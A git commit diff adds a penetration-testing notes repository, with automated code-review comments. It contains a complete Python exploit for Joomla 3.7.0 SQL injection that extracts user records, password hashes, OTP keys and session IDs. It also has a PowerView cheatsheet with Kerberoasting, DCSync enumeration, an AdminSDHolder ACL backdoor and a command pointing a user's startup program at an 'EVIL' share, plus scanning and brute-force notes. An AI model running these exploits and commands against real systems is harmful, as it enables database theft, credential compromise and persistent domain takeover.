second commit
This commit is contained in:
parent
7bb194b436
commit
d4648a2f18
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 975a23ae3487a57c9919a8386cf1d1a2049aa631
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit d943001a7defb5e0d1657085a77a0e78609be58f
|
|
@ -0,0 +1,207 @@
|
||||||
|
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
|
||||||
|
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
|
||||||
|
|
||||||
|
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
|
||||||
|
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
|
||||||
|
|
||||||
|
# New function naming schema:
|
||||||
|
# Verbs:
|
||||||
|
# Get : retrieve full raw data sets
|
||||||
|
# Find : ‘find’ specific data entries in a data set
|
||||||
|
# Add : add a new object to a destination
|
||||||
|
# Set : modify a given object
|
||||||
|
# Invoke : lazy catch-all
|
||||||
|
# Nouns:
|
||||||
|
# Verb-Domain* : indicates that LDAP/.NET querying methods are being executed
|
||||||
|
# Verb-WMI* : indicates that WMI is being used under the hood to execute enumeration
|
||||||
|
# Verb-Net* : indicates that Win32 API access is being used under the hood
|
||||||
|
|
||||||
|
|
||||||
|
# get all the groups a user is effectively a member of, 'recursing up' using tokenGroups
|
||||||
|
Get-DomainGroup -MemberIdentity <User/Group>
|
||||||
|
|
||||||
|
# get all the effective members of a group, 'recursing down'
|
||||||
|
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
|
||||||
|
|
||||||
|
# use an alterate creadential for any function
|
||||||
|
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
|
||||||
|
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
|
||||||
|
Get-DomainUser -Credential $Cred
|
||||||
|
|
||||||
|
# retrieve all the computer dns host names a GPP password applies to
|
||||||
|
Get-DomainOU -GPLink '<GPP_GUID>' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname}
|
||||||
|
|
||||||
|
# get all users with passwords changed > 1 year ago, returning sam account names and password last set times
|
||||||
|
$Date = (Get-Date).AddYears(-1).ToFileTime()
|
||||||
|
Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset
|
||||||
|
|
||||||
|
# all enabled users, returning distinguishednames
|
||||||
|
Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname
|
||||||
|
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname
|
||||||
|
|
||||||
|
# all disabled users
|
||||||
|
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
|
||||||
|
Get-DomainUser -UACFilter ACCOUNTDISABLE
|
||||||
|
|
||||||
|
# all users that require smart card authentication
|
||||||
|
Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
|
||||||
|
Get-DomainUser -UACFilter SMARTCARD_REQUIRED
|
||||||
|
|
||||||
|
# all users that *don't* require smart card authentication, only returning sam account names
|
||||||
|
Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname
|
||||||
|
Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname
|
||||||
|
|
||||||
|
# use multiple identity types for any *-Domain* function
|
||||||
|
'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff
|
||||||
|
|
||||||
|
# find all users with an SPN set (likely service accounts)
|
||||||
|
Get-DomainUser -SPN
|
||||||
|
|
||||||
|
# check for users who don't have kerberos preauthentication set
|
||||||
|
Get-DomainUser -PreauthNotRequired
|
||||||
|
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
|
||||||
|
|
||||||
|
# find all service accounts in "Domain Admins"
|
||||||
|
Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'}
|
||||||
|
|
||||||
|
# find users with sidHistory set
|
||||||
|
Get-DomainUser -LDAPFilter '(sidHistory=*)'
|
||||||
|
|
||||||
|
# find any users/computers with constrained delegation st
|
||||||
|
Get-DomainUser -TrustedToAuth
|
||||||
|
Get-DomainComputer -TrustedToAuth
|
||||||
|
|
||||||
|
# enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation
|
||||||
|
$Computers = Get-DomainComputer -Unconstrained
|
||||||
|
$Users = Get-DomainUser -AllowDelegation -AdminCount
|
||||||
|
|
||||||
|
# return the local *groups* of a remote server
|
||||||
|
Get-NetLocalGroup SERVER.domain.local
|
||||||
|
|
||||||
|
# return the local group *members* of a remote server using Win32 API methods (faster but less info)
|
||||||
|
Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local
|
||||||
|
|
||||||
|
# Kerberoast any users in a particular OU with SPNs set
|
||||||
|
Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"
|
||||||
|
|
||||||
|
# Find-DomainUserLocation == old Invoke-UserHunter
|
||||||
|
# enumerate servers that allow unconstrained Kerberos delegation and show all users logged in
|
||||||
|
Find-DomainUserLocation -ComputerUnconstrained -ShowAll
|
||||||
|
|
||||||
|
# hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation
|
||||||
|
Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation
|
||||||
|
|
||||||
|
# find all computers in a given OU
|
||||||
|
Get-DomainComputer -SearchBase "ldap://OU=..."
|
||||||
|
|
||||||
|
# Get the logged on users for all machines in any *server* OU in a particular domain
|
||||||
|
Get-DomainOU -Identity *server* -Domain <domain> | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %{Get-NetLoggedOn -ComputerName $_}}
|
||||||
|
|
||||||
|
# enumerate all gobal catalogs in the forest
|
||||||
|
Get-ForestGlobalCatalog
|
||||||
|
|
||||||
|
# turn a list of computer short names to FQDNs, using a global catalog
|
||||||
|
gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname}
|
||||||
|
|
||||||
|
# enumerate the current domain controller policy
|
||||||
|
$DCPolicy = Get-DomainPolicy -Policy DC
|
||||||
|
$DCPolicy.PrivilegeRights # user privilege rights on the dc...
|
||||||
|
|
||||||
|
# enumerate the current domain policy
|
||||||
|
$DomainPolicy = Get-DomainPolicy -Policy Domain
|
||||||
|
$DomainPolicy.KerberosPolicy # useful for golden tickets ;)
|
||||||
|
$DomainPolicy.SystemAccess # password age/etc.
|
||||||
|
|
||||||
|
# enumerate what machines that a particular user/group identity has local admin rights to
|
||||||
|
# Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation
|
||||||
|
Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>
|
||||||
|
|
||||||
|
# enumerate what machines that a given user in the specified domain has RDP access rights to
|
||||||
|
Get-DomainGPOUserLocalGroupMapping -Identity <USER> -Domain <DOMAIN> -LocalGroup RDP
|
||||||
|
|
||||||
|
# export a csv of all GPO mappings
|
||||||
|
Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv
|
||||||
|
|
||||||
|
# use alternate credentials for searching for files on the domain
|
||||||
|
# Find-InterestingDomainShareFile == old Invoke-FileFinder
|
||||||
|
$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
|
||||||
|
$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password)
|
||||||
|
Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential
|
||||||
|
|
||||||
|
# enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names
|
||||||
|
Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local
|
||||||
|
|
||||||
|
# grant user 'will' the rights to change 'matt's password
|
||||||
|
Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose
|
||||||
|
|
||||||
|
# audit the permissions of AdminSDHolder, resolving GUIDs
|
||||||
|
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs
|
||||||
|
|
||||||
|
# backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
|
||||||
|
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
|
||||||
|
|
||||||
|
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
|
||||||
|
Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
|
||||||
|
($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
|
||||||
|
}
|
||||||
|
|
||||||
|
# find linked DA accounts using name correlation
|
||||||
|
Get-DomainGroupMember 'Domain Admins' | %{Get-DomainUser $_.membername -LDAPFilter '(displayname=*)'} | %{$a=$_.displayname.split(' ')[0..1] -join ' '; Get-DomainUser -LDAPFilter "(displayname=*$a*)" -Properties displayname,samaccountname}
|
||||||
|
|
||||||
|
# save a PowerView object to disk for later usage
|
||||||
|
Get-DomainUser | Export-Clixml user.xml
|
||||||
|
$Users = Import-Clixml user.xml
|
||||||
|
|
||||||
|
# Find any machine accounts in privileged groups
|
||||||
|
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'}
|
||||||
|
|
||||||
|
# Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights
|
||||||
|
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')}
|
||||||
|
|
||||||
|
# find all policies applied to a current machine
|
||||||
|
Get-DomainGPO -ComputerIdentity windows1.testlab.local
|
||||||
|
|
||||||
|
# enumerate all groups in a domain that don't have a global scope, returning just group names
|
||||||
|
Get-DomainGroup -GroupScope NotGlobal -Properties name
|
||||||
|
|
||||||
|
# enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships
|
||||||
|
# query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames
|
||||||
|
$ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'} | Select-Object -ExpandProperty distinguishedname
|
||||||
|
$Domains = @{}
|
||||||
|
$ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) {
|
||||||
|
# extract the domain the foreign user was added to
|
||||||
|
$ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
|
||||||
|
# check if we've already enumerated this domain
|
||||||
|
if (-not $Domains[$ForeignUserDomain]) {
|
||||||
|
$Domains[$ForeignUserDomain] = $True
|
||||||
|
# enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set
|
||||||
|
$Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))"
|
||||||
|
Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member
|
||||||
|
}
|
||||||
|
}
|
||||||
|
$ForeignMemberships | fl
|
||||||
|
|
||||||
|
# if running in -sta mode, impersonate another credential a la "runas /netonly"
|
||||||
|
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
|
||||||
|
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
|
||||||
|
Invoke-UserImpersonation -Credential $Cred
|
||||||
|
# ... action
|
||||||
|
Invoke-RevertToSelf
|
||||||
|
|
||||||
|
# enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned by Get-DomainComputer
|
||||||
|
Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier
|
||||||
|
|
||||||
|
# set the specified property for the given user identity
|
||||||
|
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
|
||||||
|
|
||||||
|
# Set the owner of 'dfm' in the current domain to 'harmj0y'
|
||||||
|
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
|
||||||
|
|
||||||
|
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
|
||||||
|
Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? {
|
||||||
|
($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')
|
||||||
|
}
|
||||||
|
|
||||||
|
# check if any user passwords are set
|
||||||
|
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
|
||||||
|
|
|
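Review bot: The credential examples `$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force` (and the later `$Password = "PASSWORD" | ConvertTo-SecureString ...` and `'Password123!'` lines) put cleartext passwords into a committed file and into the PowerShell history/transcript of anyone who pastes them; for a cheatsheet the prompting form `$Cred = Get-Credential 'TESTLAB\dfm.a'` demonstrates the same `-Credential` usage without a secret ever landing on disk. The comment `# use an alterate creadential for any function` has two typos (alternate, credential); `firest` in the Find-DomainObjectPropertyOutlier comment and `gobal` in the Get-ForestGlobalCatalog comment are also misspelled.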
@ -0,0 +1,17 @@
|
||||||
|
# Antivirus Evasion
|
||||||
|
|
||||||
|
* Existing types
|
||||||
|
* On-Disk evasion
|
||||||
|
* In-Memory evasion
|
||||||
|
|
||||||
|
* Detection Methods
|
||||||
|
* Static Detection -- Hash or String/Byte Matching
|
||||||
|
* Dynamic / Heuristic / Behaviourial Detection -- predefined rules, run inside a sandbox
|
||||||
|
|
||||||
|
|
||||||
|
## Links
|
||||||
|
* [cmnatic](https://cmnatic.co.uk/)
|
||||||
|
* [cmnatic's diss](https://resources.cmnatic.co.uk/Presentations/Dissertation/)
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 5fc1c93767878028c0f8c74de37cb9dee1659f60
|
Binary file not shown.
|
@ -0,0 +1,48 @@
|
||||||
|
# Gobuster
|
||||||
|
|
||||||
|
[Repo](https://github.com/OJ/gobuster.git)
|
||||||
|
|
||||||
|
### Directories
|
||||||
|
```sh
|
||||||
|
gobuster dir -u <URL> -w <wordlist>
|
||||||
|
```
|
||||||
|
|
||||||
|
### DNS
|
||||||
|
```sh
|
||||||
|
gobuster dns -d <domainName> -w <wordlist> --show-cname --show-ips --resolver <dns-Server>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Vhosts
|
||||||
|
* Find other Domains on a host via `seclists/Discovery/DNS/subdomains-top1million-5000.txt`
|
||||||
|
```sh
|
||||||
|
gobuster vhost -u <URL> -w <wordlist>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### FileExtension
|
||||||
|
```sh
|
||||||
|
-x
|
||||||
|
```
|
||||||
|
* Fuzz for files and file extensions
|
||||||
|
```sh
|
||||||
|
gobuster dir -u <URL> -w /usr/share/seclists/Discovery/raft-small-word-lowercase.txt -x .conf,.js
|
||||||
|
```
|
||||||
|
|
||||||
|
### Basic Auth
|
||||||
|
```sh
|
||||||
|
gobuster help dir
|
||||||
|
```
|
||||||
|
* `--username` and `--password`
|
||||||
|
|
||||||
|
* `dir -s` Accept HTTP Status
|
||||||
|
* `dir -k` Skip TLS Auth
|
||||||
|
* `dir -a` User Agent
|
||||||
|
|
||||||
|
### Wordlists
|
||||||
|
```sh
|
||||||
|
/usr/share/seclists/Discovery/Web-Content/common.txt
|
||||||
|
/usr/share/seclists/Discovery/Web-Content/big.txt
|
||||||
|
/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
|
||||||
|
/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
|
||||||
|
/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
|
||||||
|
```
|
|
@ -0,0 +1,17 @@
|
||||||
|
# nmap
|
||||||
|
|
||||||
|
# Usage
|
||||||
|
|
||||||
|
```sh
|
||||||
|
nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit <IP>
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
nmap -oA nmap-vuln -Pn -script vuln -p <Port,Port,Port,...> <IP>
|
||||||
|
```
|
||||||
|
|
||||||
|
## combo with searchsploit
|
||||||
|
* nmap-full scan
|
||||||
|
```sh
|
||||||
|
sudo nmap -oA --nmap-full -sS -sC -sV -p- --defeat-rst-ratelimit <target-IP>
|
||||||
|
searchsploit --nmap ./nmap-full.xml --verbose
|
||||||
|
```
|
|
@ -0,0 +1,35 @@
|
||||||
|
# WPScan
|
||||||
|
|
||||||
|
## Themes
|
||||||
|
```sh
|
||||||
|
wpscan --url <URL> --enumerate t
|
||||||
|
```
|
||||||
|
|
||||||
|
* `ls` for content
|
||||||
|
|
||||||
|
## Plugins
|
||||||
|
```sh
|
||||||
|
wpscan --url <URL> --enumerate p
|
||||||
|
```
|
||||||
|
|
||||||
|
## Users
|
||||||
|
```sh
|
||||||
|
wpscan --url <URL> --enumerate u
|
||||||
|
```
|
||||||
|
|
||||||
|
## Vulnerabilities
|
||||||
|
* WPVulnDB API is needed
|
||||||
|
* Plugins
|
||||||
|
```sh
|
||||||
|
wpscan --url <URL> --enumerate vp
|
||||||
|
```
|
||||||
|
|
||||||
|
## Password attack
|
||||||
|
```sh
|
||||||
|
wpscan --url <URL> --passwords <wordlist> --usernames <usersFromEnumeration>
|
||||||
|
```
|
||||||
|
|
||||||
|
## WAF Aggressiveness
|
||||||
|
```sh
|
||||||
|
wpscan --url <URL> --enumerate p --plugins-detection <aggressive/passive>
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit f7bc13252b4da5d13b2e9d93295da28a1f612125
|
|
@ -0,0 +1,186 @@
|
||||||
|
#!/usr/bin/python3
|
||||||
|
import requests
|
||||||
|
import sys
|
||||||
|
import re
|
||||||
|
import argparse
|
||||||
|
import os
|
||||||
|
import random
|
||||||
|
import time
|
||||||
|
import binascii
|
||||||
|
|
||||||
|
|
||||||
|
def extract_token(resp):
|
||||||
|
match = re.search(r'name="([a-f0-9]{32})" value="1"', resp.text, re.S)
|
||||||
|
if match is None:
|
||||||
|
print(" [!] Cannot find CSRF token")
|
||||||
|
return None
|
||||||
|
return match.group(1)
|
||||||
|
|
||||||
|
|
||||||
|
def parse_options():
|
||||||
|
parser = argparse.ArgumentParser(description='Jooma Exploit')
|
||||||
|
parser.add_argument('url', help='Base URL for Joomla site')
|
||||||
|
return parser.parse_args()
|
||||||
|
|
||||||
|
|
||||||
|
def build_sqli(colname, morequery):
|
||||||
|
return "(SELECT " + colname + " " + morequery + ")"
|
||||||
|
|
||||||
|
def joomla_370_sqli_extract(options, sess, token, colname, morequery):
|
||||||
|
sqli = build_sqli("LENGTH("+colname+")", morequery)
|
||||||
|
length = joomla_370_sqli(options, sess, token, sqli)
|
||||||
|
if not length:
|
||||||
|
return None
|
||||||
|
length = int(length)
|
||||||
|
maxbytes = 30
|
||||||
|
offset = 0
|
||||||
|
result = ''
|
||||||
|
while length > offset:
|
||||||
|
sqli = build_sqli("HEX(MID(%s,%d,%d))" % (colname, offset + 1, 16), morequery)
|
||||||
|
value = joomla_370_sqli(options, sess, token, sqli)
|
||||||
|
if not value:
|
||||||
|
print(" [!] Failed to retrieve string for query:", sqli)
|
||||||
|
return None
|
||||||
|
value = binascii.unhexlify(value)
|
||||||
|
result += value
|
||||||
|
offset += len(value)
|
||||||
|
return result
|
||||||
|
|
||||||
|
|
||||||
|
def joomla_370_sqli(options, sess, token, sqli):
|
||||||
|
sqli_full = "UpdateXML(2, concat(0x3a," + sqli + ", 0x3a), 1)"
|
||||||
|
data = {
|
||||||
|
'option': 'com_fields',
|
||||||
|
'view': 'fields',
|
||||||
|
'layout': 'modal',
|
||||||
|
'list[fullordering]': sqli_full,
|
||||||
|
token: '1',
|
||||||
|
}
|
||||||
|
resp = sess.get(options.url + "/index.php?option=com_fields&view=fields&layout=modal", params=data, allow_redirects=False)
|
||||||
|
match = re.search(r'XPATH syntax error:\s*'([^$\n]+)\s*'\s*</bl', resp.text, re.S)
|
||||||
|
if match:
|
||||||
|
match = match.group(1).strip()
|
||||||
|
if match[0] != ':' and match[-1] != ':':
|
||||||
|
return None
|
||||||
|
return match[1:-1]
|
||||||
|
|
||||||
|
|
||||||
|
def extract_joomla_tables(options, sess, token):
|
||||||
|
tables = list()
|
||||||
|
first = False
|
||||||
|
offset = 0
|
||||||
|
while True:
|
||||||
|
result = joomla_370_sqli_extract(options, sess, token, "TABLE_NAME", "FROM information_schema.tables WHERE TABLE_NAME LIKE 0x257573657273 LIMIT " + str(offset) + ",1" )
|
||||||
|
if result is None:
|
||||||
|
if first:
|
||||||
|
print("[!] Failed to retrieve first table name!")
|
||||||
|
return False
|
||||||
|
break
|
||||||
|
tables.append(result)
|
||||||
|
print(" - Found table:", result)
|
||||||
|
first = False
|
||||||
|
offset += 1
|
||||||
|
return tables
|
||||||
|
|
||||||
|
|
||||||
|
def extract_joomla_users(options, sess, token, table_name):
|
||||||
|
users = list()
|
||||||
|
offset = 0
|
||||||
|
first = False
|
||||||
|
print(" - Extracting users from", table_name)
|
||||||
|
while True:
|
||||||
|
result = joomla_370_sqli_extract(options, sess, token, "CONCAT(id,0x7c,name,0x7c,username,0x7c,email,0x7c,password,0x7c,otpKey,0x7c,otep)", "FROM %s ORDER BY registerDate ASC LIMIT %d,1" % (table_name, offset) )
|
||||||
|
if result is None:
|
||||||
|
if first:
|
||||||
|
print("[!] Failed to retrieve user from table!")
|
||||||
|
return False
|
||||||
|
break
|
||||||
|
result = result.split('|')
|
||||||
|
print(" [$] Found user",result)
|
||||||
|
first = False
|
||||||
|
offset += 1
|
||||||
|
users.append(result)
|
||||||
|
return users
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def extract_joomla_sessions(options, sess, token, table_name):
|
||||||
|
sessions = list()
|
||||||
|
offset = 0
|
||||||
|
first = False
|
||||||
|
print(" - Extracting sessions from", table_name)
|
||||||
|
while True:
|
||||||
|
result = joomla_370_sqli_extract(options, sess, token, "CONCAT(userid,0x7c,session_id,0x7c,username)", "FROM %s WHERE guest = 0 LIMIT %d,1" % (table_name, offset) )
|
||||||
|
if result is None:
|
||||||
|
if first:
|
||||||
|
print("[!] Failed to retrieve session from table!")
|
||||||
|
return False
|
||||||
|
break
|
||||||
|
result = result.split('|')
|
||||||
|
print(" [$] Found session", result)
|
||||||
|
first = False
|
||||||
|
offset += 1
|
||||||
|
sessions.append(result)
|
||||||
|
return sessions
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def pwn_joomla_again(options):
|
||||||
|
sess = requests.Session()
|
||||||
|
|
||||||
|
print(" [-] Fetching CSRF token")
|
||||||
|
resp = sess.get(options.url + "/index.php/component/users/?view=login")
|
||||||
|
token = extract_token(resp)
|
||||||
|
if not token:
|
||||||
|
return False
|
||||||
|
|
||||||
|
# Verify that we can perform SQLi
|
||||||
|
print(" [-] Testing SQLi")
|
||||||
|
result = joomla_370_sqli(options, sess, token, "128+127")
|
||||||
|
if result != "255":
|
||||||
|
print(" [!] Could not find SQLi output!")
|
||||||
|
return False
|
||||||
|
|
||||||
|
tables = extract_joomla_tables(options, sess, token)
|
||||||
|
|
||||||
|
for table_name in tables:
|
||||||
|
table_prefix = table_name[:-5]
|
||||||
|
extract_joomla_users(options, sess, token, table_name)
|
||||||
|
extract_joomla_sessions(options, sess, token, table_prefix + 'session')
|
||||||
|
|
||||||
|
return True
|
||||||
|
|
||||||
|
def print_logo():
|
||||||
|
clear = "\x1b[0m"
|
||||||
|
colors = [31, 32, 33, 34, 35, 36]
|
||||||
|
|
||||||
|
logo = """
|
||||||
|
.---. .-'''-. .-'''-.
|
||||||
|
| | ' _ \ ' _ \ .---.
|
||||||
|
'---' / /` '. \ / /` '. \ __ __ ___ /| | | .
|
||||||
|
.---.. | \ ' . | \ ' | |/ `.' `. || | | .'|
|
||||||
|
| || ' | '| ' | '| .-. .-. '|| | | < |
|
||||||
|
| |\ \ / / \ \ / / | | | | | ||| __ | | __ | |
|
||||||
|
| | `. ` ..' / `. ` ..' / | | | | | |||/'__ '. | | .:--.'. | | .'''-.
|
||||||
|
| | '-...-'` '-...-'` | | | | | ||:/` '. '| |/ | \ | | |/.'''. \
|
||||||
|
| | | | | | | ||| | || |`" __ | | | / | |
|
||||||
|
| | |__| |__| |__|||\ / '| | .'.''| | | | | |
|
||||||
|
__.' ' |/\'..' / '---'/ / | |_| | | |
|
||||||
|
| ' ' `'-'` \ \._,\ '/| '. | '.
|
||||||
|
|____.' `--' `" '---' '---'
|
||||||
|
"""
|
||||||
|
for line in logo.split("\n"):
|
||||||
|
sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
|
||||||
|
#time.sleep(0.05)
|
||||||
|
|
||||||
|
def main(base_url):
|
||||||
|
options = parse_options()
|
||||||
|
options.url = options.url.rstrip('/')
|
||||||
|
print_logo()
|
||||||
|
pwn_joomla_again(options)
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
sys.exit(main("http://192.168.10.100:8080/joomla"))
|
||||||
|
|
|
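Review bot: `def main(base_url):` declares a parameter that is never read — `parse_options()` takes the target from argv — so the URL passed at `sys.exit(main("http://192.168.10.100:8080/joomla"))` is dead and misleading; either drop it (`def main():` / `sys.exit(main())`) or feed it into argparse as the default for `url`. `main` also returns `None`, so `sys.exit` reports success even when `pwn_joomla_again` returns `False`; `return 0 if pwn_joomla_again(options) else 1` would make the exit status meaningful. In `extract_joomla_tables`, `extract_joomla_users` and `extract_joomla_sessions` the flag `first` is initialised to `False` and only ever assigned `False`, so the `[!] Failed to retrieve ...` branches can never run; it looks like it should start as `True`, and the caller then needs to handle a `False` return before iterating over `tables`. `os` and `time` are imported but unused.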
@ -0,0 +1 @@
|
||||||
|
Subproject commit 9cfb81e4fab8037acb44c678773ca3f93bc2b39c
|
|
@ -0,0 +1,16 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
from scapy.all import *
|
||||||
|
|
||||||
|
interface = "wls3"
|
||||||
|
ip_range = "192.168.179.0/24"
|
||||||
|
broadcastMac = "ff:ff:ff:ff:ff:ff"
|
||||||
|
|
||||||
|
packet = Ether(dst=broadcastMac)/ARP(pdst=ip_range)
|
||||||
|
|
||||||
|
ans, unans = srp(packet, timeout=2, iface=interface, inter=0.1)
|
||||||
|
|
||||||
|
for send, receive in ans:
|
||||||
|
print(receive.sprintf(r"%Ether.src% - %ARP.psrc%"))
|
||||||
|
|
||||||
|
|
|
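Review bot: `interface = "wls3"` and `ip_range = "192.168.179.0/24"` are hardcoded, so the script has to be edited for every host it runs on; read them from `sys.argv` (or argparse) and keep these values only as documented defaults. `ans, unans = srp(...)` binds `unans` without using it — `ans, _ = srp(...)` makes the intent explicit. A short module docstring stating that this sends a broadcast ARP request to the given range and prints `MAC - IP` for each reply would help a reader who does not know scapy's `srp`.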
@ -0,0 +1,16 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import sys
|
||||||
|
|
||||||
|
sub_dirs = []
|
||||||
|
with open ("/home/whackx/Downloads/wordlist2.txt", 'r') as _f:
|
||||||
|
sub_dirs = _f.read().splitlines()
|
||||||
|
|
||||||
|
for dir in sub_dirs:
|
||||||
|
dir_enum = f"http://{sys.argv[1]}/{dir}.html"
|
||||||
|
r = requests.get(dir_enum)
|
||||||
|
if r.status_code == 404:
|
||||||
|
pass
|
||||||
|
else:
|
||||||
|
print("Valid directory: ", dir_enum)
|
|
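Review bot: The wordlist path `/home/whackx/Downloads/wordlist2.txt` is hardcoded to one user's home directory (the subdomain script later in this commit uses the same path), so the script raises `FileNotFoundError` on any other machine; take it as a second argument or argparse option. `requests.get(dir_enum)` has no `timeout`, so one non-responding host stalls the loop indefinitely; pass `timeout=` and catch `requests.RequestException` per iteration. `for dir in sub_dirs` shadows the `dir` builtin and `sys.argv[1]` is read without checking `len(sys.argv)`; rename the loop variable to `path` and print a usage line when the argument is missing. The `if r.status_code == 404: pass` / `else:` pair reads more directly as `if r.status_code != 404:`.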
@ -0,0 +1,7 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
import requests
|
||||||
|
|
||||||
|
url = "https://download.sysinternals.com/files/PSTools.zip"
|
||||||
|
r = requests.get(url, allow_redirects=True)
|
||||||
|
open("PSTools.zip", 'wb').write(r.content)
|
|
